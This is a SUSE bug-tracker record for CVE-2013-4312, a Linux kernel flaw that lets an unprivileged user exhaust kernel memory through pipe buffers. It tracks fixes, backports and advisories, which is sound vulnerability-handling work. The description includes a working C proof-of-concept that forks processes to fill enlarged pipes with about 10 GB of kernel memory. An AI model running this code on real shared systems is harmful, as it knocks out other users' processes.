839104 – (CVE-2013-4312) VUL-2: CVE-2013-4312: kernel: memory consumption by unprivileged user

Bug 839104 (CVE-2013-4312) - VUL-2: CVE-2013-4312: kernel: memory consumption by unprivileged user

Summary: VUL-2: CVE-2013-4312: kernel: memory consumption by unprivileged user

Status:	RESOLVED FIXED
Duplicates (1):	922947 (view as bug list)

Alias:	CVE-2013-4312

Product:	SUSE Security Incidents
Classification:	Novell Products
Component:	Incidents (show other bugs)
Version:	unspecified
Hardware:	Other Other

Priority:	P4 - Low Severity: Normal
Target Milestone:	---
Deadline:	2016-08-15
Assignee:	Security Team bot
QA Contact:	Security Team bot

URL:
Whiteboard:	maint:running:62977:moderate maint:re...
Keywords:

Depends on:
Blocks:

Clone This Bug

Reported:	2013-09-09 08:00 UTC by Alexander Bergmann
Modified:	2018-07-03 20:45 UTC (History)
CC List:	4 users (show)

See Also:
Found By:	---
Services Priority:
Business Priority:
Blocker:	---
Marketing QA Status:	---
IT Deployment:	---

Attachments
Add an attachment (proposed patch, testcase, etc.)

Note You need to log in before you can comment on or make changes to this bug.

Description Alexander Bergmann 2013-09-09 08:00:00 UTC

Not public yet via linux-distros.

Date: Fri, 6 Sep 2013 11:35:09 -0700
From: Kees Cook
Subject: [vs-plain] Fwd: All memory consumption by a local unprivileged user.

CVE-2013-4312 was assigned to this issue.

-------------------------------
Description of the problem:

  Since 2.6.35, an unprivileged user who can execute arbitrary program can
  consume almost all memory in a way OOM killer cannot find it. Currently
  available solution for 3.8 and later is to use kmemcg control group
  ( memory.kmem.limit_in_bytes ), but use of cgred service is needed if
  we want to restrict usage based on uid. Therefore, I expect that either

    OOM killer takes into account how much memory is used by each uid

  or

    simple mechanism like /proc/sys/mm/per_uid_kmem_max which limits
    kernel memory each uid can allocate

  is added.

Background of the problem:

Commit 35f3d14d "pipe: add support for shrinking and growing pipes" added
fcntl(F_SETPIPE_SZ/F_GETPIPE_SZ). A local unprivileged user can easily do
forkbomb-like memory consumption, for 1048576 (default size which each pipe's
file descriptor can hold) x 1024 (default number of file descriptors per
process) x 1024 (default max user processes) can easily exceed the RAM the
machine has, and can kill many of other unprivileged users' processes before
the memory eater is chosen by the OOM killer. An example of memory eater which
will consume about 10GB of kernel memory is shown below.

---------- test.c ----------
#include <stdio.h>
#include <fcntl.h>
#include <unistd.h>
#include <errno.h>
#define F_SETPIPE_SZ (1024 + 7)

static void child(void)
{
        int fd[2];
        while (pipe(fd) != EOF &&
               fcntl(fd[1], F_SETPIPE_SZ, 1048576) != EOF) {
                int i;
                for (i = 0; i < 256; i++) {
                        static char buf[4096];
                        if (write(fd[1], buf, sizeof(buf)) != sizeof(buf)) {
                                printf("write error\n");
                                _exit(1);
                        }
                }
                close(fd[0]);
        }
        pause();
        _exit(0);
}

int main(int argc, char *argv[])
{
        int i;
        close(0);
        for (i = 2; i < 1024; i++)
                close(i);
        for (i = 0; i < 10; i++)
                if (fork() == 0)
                        child();
        return 0;
}
---------- test.c ----------

Comment 1 Swamp Workflow Management 2013-09-09 22:00:09 UTC

bugbot adjusting priority

Comment 2 Marcus Meissner 2013-11-27 21:39:35 UTC

not yet fixed

Comment 3 SMASH SMASH 2014-02-27 14:50:11 UTC

Affected packages:

SLE-11-SP3: kernel-source
SLE-10-SP3-TERADATA: kernel-source
SLE-11-SP1-TERADATA: kernel-source
SLE-11-SP2: kernel-source

Comment 5 Marcus Meissner 2014-03-13 14:47:55 UTC

There was no progress on the closed list and no publication.

denial of service is always a bit hard to define in the kernel case,
while we meanwhile assume protection mechanisms exists that trigger on bad users (e.g. ulimits or similar) , if something is not catchable it might be considered
a security issue.

I pinged the list again.

Comment 8 Marcus Meissner 2014-09-29 09:59:55 UTC

yes, lets close for now.

Comment 9 Jiri Slaby 2016-03-16 11:12:08 UTC

Reopening for reconsideration, because the fix landed in 3.12 as:
commit 3d024dcef2548028e9f9b7876a544e6e0af00175
Author: willy tarreau <w@1wt.eu>
Date:   Sun Jan 10 07:54:56 2016 +0100

    unix: properly account for FDs passed over unix sockets
    
    [ Upstream commit 712f4aad406bb1ed67f3f98d04c044191f0ff593 ]

But it breaks kABI heavily (struct user_struct change), so I will revert in SLE12.

Comment 10 Michal Hocko 2016-03-16 12:19:03 UTC

(In reply to Jiri Slaby from comment #9)
> Reopening for reconsideration, because the fix landed in 3.12 as:
> commit 3d024dcef2548028e9f9b7876a544e6e0af00175
> Author: willy tarreau <w@1wt.eu>
> Date:   Sun Jan 10 07:54:56 2016 +0100
> 
>     unix: properly account for FDs passed over unix sockets
>     
>     [ Upstream commit 712f4aad406bb1ed67f3f98d04c044191f0ff593 ]
> 
> But it breaks kABI heavily (struct user_struct change), so I will revert in
> SLE12.

Is the kABI a real concern? This structure should be pretty much internal. There is even not any public API to has new user structures.

Anyway, I do not think this is something super critical. We have other means how to deplete all the memory and DoS the system. I just think that we should try to patch this one if the kABI part is not super critical

Comment 11 Jiri Slaby 2016-03-18 14:32:31 UTC

(In reply to Michal Hocko from comment #10)
> Is the kABI a real concern? This structure should be pretty much internal.
> There is even not any public API to has new user structures.

Yes, correct. I released 3.12.57 today and merged it to SLE12. The kabi breakage could be worked around. SP2 will get it from stable too, so I think we can close now again.

Comment 12 Michal Hocko 2016-03-18 14:48:42 UTC

We probably want it for older kernels as well. This has been broken since ever I guess.

Comment 13 Michal Hocko 2016-07-26 13:07:44 UTC

I am sorry it took so long.

Pushed to cve/linux-3.0 and cve/linux-2.6.32. This should cover all branches.

Btw. Michal (CCed) has noticed there is a follow up fix 415e3d3e90ce ("unix: correctly track in-flight fds in sending process user_struct").

The commit log says:
"
    The commit referenced in the Fixes tag incorrectly accounted the number
    of in-flight fds over a unix domain socket to the original opener
    of the file-descriptor. This allows another process to arbitrary
    deplete the original file-openers resource limit for the maximum of
    open files. Instead the sending processes and its struct cred should
    be credited.
"

The backport would break kABI which would be far from trivial to backport for old trees. But I think we do not have to lose sleep over that. If a process sends a fd over to another process over the socket it should trust it because it is handing over its own security domain (open of a file) to it. Having adversary receiver can have other security implications already. So I believe that not having this follow up should be acceptable and still better than without 712f4aad406bb1 ("unix: properly account for FDs passed over unix sockets")

Let me know if I have missed something.

Bouncing back to the security team.

Comment 14 Marcus Meissner 2016-08-01 11:35:46 UTC

Lets so far consider not to fix this problem.

Comment 15 Michal Hocko 2016-08-01 12:05:53 UTC

*** Bug 922947 has been marked as a duplicate of this bug. ***

Comment 16 Swamp Workflow Management 2016-08-08 05:04:24 UTC

An update workflow for this issue was started.
This issue was rated as important.
Please submit fixed packages until 2016-08-15.
When done, reassign the bug to security-team@suse.de.
https://swamp.suse.de/webswamp/wf/62924

Comment 17 Swamp Workflow Management 2016-09-06 13:09:12 UTC

SUSE-SU-2016:2245-1: An update that solves 25 vulnerabilities and has 22 fixes is now available.

Category: security (important)
Bug References: 839104,866130,919351,944309,950998,960689,962404,963655,963762,966460,969149,970114,971126,971360,971446,971729,971944,974428,975945,978401,978821,978822,979213,979274,979548,979681,979867,979879,980371,980725,980788,980931,981267,983143,983213,983535,984107,984755,986362,986365,986445,986572,987709,988065,989152,989401,991608
CVE References: CVE-2013-4312,CVE-2015-7513,CVE-2015-7833,CVE-2016-0758,CVE-2016-1583,CVE-2016-2053,CVE-2016-2187,CVE-2016-3134,CVE-2016-3955,CVE-2016-4470,CVE-2016-4482,CVE-2016-4485,CVE-2016-4486,CVE-2016-4565,CVE-2016-4569,CVE-2016-4578,CVE-2016-4580,CVE-2016-4805,CVE-2016-4913,CVE-2016-4997,CVE-2016-4998,CVE-2016-5244,CVE-2016-5696,CVE-2016-5829,CVE-2016-6480
Sources used:
SUSE OpenStack Cloud 5 (src):    kernel-bigsmp-3.0.101-0.47.86.1, kernel-default-3.0.101-0.47.86.1, kernel-ec2-3.0.101-0.47.86.1, kernel-source-3.0.101-0.47.86.1, kernel-syms-3.0.101-0.47.86.1, kernel-trace-3.0.101-0.47.86.1, kernel-xen-3.0.101-0.47.86.1
SUSE Manager Proxy 2.1 (src):    kernel-bigsmp-3.0.101-0.47.86.1, kernel-default-3.0.101-0.47.86.1, kernel-ec2-3.0.101-0.47.86.1, kernel-source-3.0.101-0.47.86.1, kernel-syms-3.0.101-0.47.86.1, kernel-trace-3.0.101-0.47.86.1, kernel-xen-3.0.101-0.47.86.1
SUSE Manager 2.1 (src):    kernel-bigsmp-3.0.101-0.47.86.1, kernel-default-3.0.101-0.47.86.1, kernel-ec2-3.0.101-0.47.86.1, kernel-source-3.0.101-0.47.86.1, kernel-syms-3.0.101-0.47.86.1, kernel-trace-3.0.101-0.47.86.1, kernel-xen-3.0.101-0.47.86.1
SUSE Linux Enterprise Server 11-SP3-LTSS (src):    kernel-bigsmp-3.0.101-0.47.86.1, kernel-default-3.0.101-0.47.86.1, kernel-ec2-3.0.101-0.47.86.1, kernel-pae-3.0.101-0.47.86.1, kernel-source-3.0.101-0.47.86.1, kernel-syms-3.0.101-0.47.86.1, kernel-trace-3.0.101-0.47.86.1, kernel-xen-3.0.101-0.47.86.1
SUSE Linux Enterprise Server 11-EXTRA (src):    kernel-bigsmp-3.0.101-0.47.86.1, kernel-default-3.0.101-0.47.86.1, kernel-pae-3.0.101-0.47.86.1, kernel-ppc64-3.0.101-0.47.86.1, kernel-trace-3.0.101-0.47.86.1, kernel-xen-3.0.101-0.47.86.1
SUSE Linux Enterprise Point of Sale 11-SP3 (src):    kernel-default-3.0.101-0.47.86.1, kernel-ec2-3.0.101-0.47.86.1, kernel-pae-3.0.101-0.47.86.1, kernel-source-3.0.101-0.47.86.1, kernel-syms-3.0.101-0.47.86.1, kernel-trace-3.0.101-0.47.86.1, kernel-xen-3.0.101-0.47.86.1
SUSE Linux Enterprise Debuginfo 11-SP3 (src):    kernel-bigsmp-3.0.101-0.47.86.1, kernel-default-3.0.101-0.47.86.1, kernel-ec2-3.0.101-0.47.86.1, kernel-pae-3.0.101-0.47.86.1, kernel-trace-3.0.101-0.47.86.1, kernel-xen-3.0.101-0.47.86.1

Comment 18 Swamp Workflow Management 2016-12-02 15:20:42 UTC

SUSE-SU-2016:2976-1: An update that solves 13 vulnerabilities and has 87 fixes is now available.

Category: security (important)
Bug References: 1000189,1001419,1002165,1003077,1003344,1003568,1003677,1003866,1003925,1004517,1004520,1005857,1005896,1005903,1006917,1006919,1007944,763198,771065,799133,803320,839104,843236,860441,863873,865783,871728,907611,908458,908684,909077,909350,909484,909618,909994,911687,915183,920016,922634,922947,928138,929141,934760,951392,956514,960689,963655,967716,968010,968014,971975,971989,973203,974620,976867,977687,979514,979595,979681,980371,982218,982783,983535,983619,984102,984194,984992,985206,986337,986362,986365,986445,987565,988440,989152,989261,989764,989779,991608,991665,991923,992566,993127,993890,993891,994296,994436,994618,994759,994926,995968,996329,996664,997708,998399,998689,999584,999600,999907,999932
CVE References: CVE-2013-4312,CVE-2015-7513,CVE-2015-8956,CVE-2016-0823,CVE-2016-3841,CVE-2016-4998,CVE-2016-5696,CVE-2016-6480,CVE-2016-6828,CVE-2016-7042,CVE-2016-7097,CVE-2016-7117,CVE-2016-7425
Sources used:
SUSE Linux Enterprise Software Development Kit 11-SP4 (src):    kernel-docs-3.0.101-88.3
SUSE Linux Enterprise Server 11-SP4 (src):    kernel-bigmem-3.0.101-88.1, kernel-default-3.0.101-88.1, kernel-ec2-3.0.101-88.1, kernel-pae-3.0.101-88.1, kernel-ppc64-3.0.101-88.1, kernel-source-3.0.101-88.1, kernel-syms-3.0.101-88.1, kernel-trace-3.0.101-88.1, kernel-xen-3.0.101-88.1
SUSE Linux Enterprise Server 11-EXTRA (src):    kernel-default-3.0.101-88.1, kernel-pae-3.0.101-88.1, kernel-ppc64-3.0.101-88.1, kernel-trace-3.0.101-88.1, kernel-xen-3.0.101-88.1
SUSE Linux Enterprise Debuginfo 11-SP4 (src):    kernel-bigmem-3.0.101-88.1, kernel-default-3.0.101-88.1, kernel-ec2-3.0.101-88.1, kernel-pae-3.0.101-88.1, kernel-ppc64-3.0.101-88.1, kernel-trace-3.0.101-88.1, kernel-xen-3.0.101-88.1

Comment 19 Swamp Workflow Management 2016-12-09 17:12:57 UTC

SUSE-SU-2016:3069-1: An update that solves 11 vulnerabilities and has 49 fixes is now available.

Category: security (important)
Bug References: 1000189,1001419,1002165,1004418,732582,839104,843236,909994,911687,915183,920016,934760,951392,956514,960689,963655,971975,971989,974620,976867,977687,979514,979595,979681,980371,982218,982783,983535,983619,984102,984194,984992,985206,986362,986365,986445,987565,988440,989152,989261,989779,991608,991665,991923,992566,993127,993890,993891,994296,994436,994618,994759,994926,996329,996664,997708,998399,999584,999600,999932
CVE References: CVE-2013-4312,CVE-2015-7513,CVE-2016-0823,CVE-2016-3841,CVE-2016-4997,CVE-2016-4998,CVE-2016-5195,CVE-2016-5696,CVE-2016-6480,CVE-2016-6828,CVE-2016-7425
Sources used:
SUSE Linux Enterprise Real Time Extension 11-SP4 (src):    kernel-rt-3.0.101.rt130-65.1, kernel-rt_trace-3.0.101.rt130-65.1, kernel-source-rt-3.0.101.rt130-65.1, kernel-syms-rt-3.0.101.rt130-65.1
SUSE Linux Enterprise Debuginfo 11-SP4 (src):    kernel-rt-3.0.101.rt130-65.1, kernel-rt_debug-3.0.101.rt130-65.1, kernel-rt_trace-3.0.101.rt130-65.1

Comment 20 Swamp Workflow Management 2017-01-30 19:14:33 UTC

SUSE-SU-2017:0333-1: An update that solves 46 vulnerabilities and has 31 fixes is now available.

Category: security (important)
Bug References: 1003077,1003925,1004517,1007944,1008645,1008831,1008833,1009443,1010150,1010467,1010501,1010507,1010711,1010716,1011482,1011685,1012422,1012832,1013038,1013531,1013542,1014746,1017710,1021258,835175,839104,863873,874145,896484,908069,914939,922947,927287,940966,950998,954984,956514,958000,960689,963053,967716,968500,969340,971360,971944,978401,978821,979213,979274,979548,979595,979879,979915,980363,980371,980725,981267,983143,983213,984755,986362,986365,986445,986572,989261,991608,991665,992566,993890,993891,994296,994436,994618,994759,995968,997059,999932
CVE References: CVE-2004-0230,CVE-2012-6704,CVE-2013-4312,CVE-2015-1350,CVE-2015-7513,CVE-2015-7833,CVE-2015-8956,CVE-2015-8962,CVE-2015-8964,CVE-2016-0823,CVE-2016-10088,CVE-2016-1583,CVE-2016-2187,CVE-2016-2189,CVE-2016-3841,CVE-2016-4470,CVE-2016-4482,CVE-2016-4485,CVE-2016-4565,CVE-2016-4569,CVE-2016-4578,CVE-2016-4580,CVE-2016-4805,CVE-2016-4913,CVE-2016-4997,CVE-2016-4998,CVE-2016-5244,CVE-2016-5829,CVE-2016-6480,CVE-2016-6828,CVE-2016-7042,CVE-2016-7097,CVE-2016-7117,CVE-2016-7425,CVE-2016-7910,CVE-2016-7911,CVE-2016-7916,CVE-2016-8399,CVE-2016-8632,CVE-2016-8633,CVE-2016-8646,CVE-2016-9555,CVE-2016-9685,CVE-2016-9756,CVE-2016-9793,CVE-2017-5551
Sources used:
SUSE Linux Enterprise Server 11-SP2-LTSS (src):    kernel-default-3.0.101-0.7.53.1, kernel-ec2-3.0.101-0.7.53.1, kernel-pae-3.0.101-0.7.53.1, kernel-source-3.0.101-0.7.53.1, kernel-syms-3.0.101-0.7.53.1, kernel-trace-3.0.101-0.7.53.1, kernel-xen-3.0.101-0.7.53.1
SUSE Linux Enterprise Debuginfo 11-SP2 (src):    kernel-default-3.0.101-0.7.53.1, kernel-ec2-3.0.101-0.7.53.1, kernel-pae-3.0.101-0.7.53.1, kernel-trace-3.0.101-0.7.53.1, kernel-xen-3.0.101-0.7.53.1

Comment 21 Marcus Meissner 2017-06-15 21:03:26 UTC

we released some fixes for this, so there is some mitigation now in place